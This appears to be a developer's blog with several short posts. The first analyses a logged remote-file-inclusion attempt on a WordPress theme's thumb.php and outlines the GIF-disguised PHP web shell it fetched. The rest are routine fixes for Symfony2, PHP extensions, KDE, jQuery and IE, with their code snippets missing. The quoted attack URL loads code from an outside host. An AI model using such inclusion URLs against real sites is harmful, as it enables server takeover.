Recently, I received a 404 notification for the following url:

http://www.metod.si/wp-content/themes/myweblog/thumb.php?src=http://picasa.com.jcibuenosaires.com.ar/2.php

Apparently the myweblog wordpress theme had (maybe still has) a RFI vulnerability.

Fortunately I do not use that theme. But I had to wonder what was inside the “2.php” file. So I downloaded it.

What was inside?

The file first tries to disguise itself as GIF image – GIF89a. But after the binary data it contains PHP code.

The PHP code is obvious. If you add &lol=1, execute first block. If you add &osc=pZ…AA=, execute second block, otherwise the third.

What does the first block do?

Well nothing special. It just identified the vulnerability and outputs some system information.

Example: v0pCr3wsys:Linux …nob0dyCr3w

Second block is practically the same, except that it accepts commands directly from url.

Just append &osc=some_base64_encoded_command and it will execute it (if possible).

Third block is an editor that tries to upload files, create them etc..

Quite some script. Also this shows that you have to always sanitize user input. That really cannot be stressed enough.

If you are doing file uploads in Symfony2 with help from the cookbook tutorial you might have ran into the following error:

Serialization of ‘Symfony\Component\HttpFoundation\File\UploadedFile’ is not allowed.

The solution I came up with involves excluding the public $file field from serialization. That way we bypass the exception.

One catch, though: this will exclude all fields that are not protected.

Add the following function to your entity:

Enjoy!

This is few simple step tutorial on how to install igbinary for PHP when you have multiple versions of PHP installed.

First off, you have to use proper binary versions of the PHP version you wish to install the extension to.

1. Go to github and download/unzip the files.
2. Go into the folder you just unzipped.

3. Run phpize. Now if you don’t have the proper phpize binary in the global configuration, then just use the full path to it. I have the php version 5.3.8 installed with phpfarm, so I will use that phpize.

4. Configure it. Make sure you put the full path to your php-config, otherwise it will not work!

5. Compile and install

7. Restart apache (assuming you run apache).

And you should see igbinary support in your phpinfo().

Getting the following error? Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken::serialize() must return a string or NULL

I was getting it while trying to login a user. The thing was, in my Role entity, all properties were private.

When doing some googling and checking things out, I found this comment on php.net which gave me an idea. I changed all private properties to protected and thing worked!

Getting the following error when trying to access your wp-admin/ panel in WordPress?

I had the same. I reuploaded all files, nothing changed. Then it slipped my mind – what if APC is doing some weird stuff? Turns out it did!

So, if you are getting this error and you have APC installed, turn the following option to “0″.

I began toying around with KDE desktop since I got tired of Gnome. I wanted to try something new and shiny. Everything went great, it is highly customizable etc. Only one thing did not work. When ssh-ing to a server it did not ask me for keychain password anymore. So how to fix that?

First, if you don’t already have it installed, install ssh-askpass:

Ok, now that that is installed, we must ensure that it asks us for password everytime we log on. For KDE we have to create a script inside ~/.kde/Autostart/ directory.

askpass.sh

You can also specify the name of the key file:

The startup script has to be correctly chmod-ed:

Now log out and log in again and it should ask you for password. Happy ssh-ing.

Today I got frustrated because when trying to parse a json string with jQuery, apparently it was causing a Missing } in XML expression error. But doing a bit more research I found the true problem. Boy was I wrong.

What was the problem?

And since Firefox and Firebug showed me purified and corrected HTML, I had no way of knowing that. So when you get this error next time, check for this situation.

That was the question I asked myself when a running cron job on a shared hosting went horribly wrong. Turns out the solution is ‘pretty’ easy. You just have to know when the cron job started. In my case it was a PHP script. So i grep-ed for php also.

You get the list of processes matching your criteria. Then you have to look for the time the script should have started. In the second column there is it’s PID. You can use that to kill it.

Recently I checked to see if my new project worked in IE6 and IE7. Well, actually I checked how it behaved. Obviously it did not work as expected.

The IE’s kept on bugging me with JS errors. IE6 said “Invalid property value”, while IE7 said “Unknown runtime error”. The code snippet was the following:

And it worked in all browsers except in IE6 and IE7. As I learned later on, IE < 8 does not support the inherit value. So when changing the inherit to an actual color value, the errors were gone. So the next time you are bugged by this kind of errors in IE < 8, check for inherit values in your CSS, JS.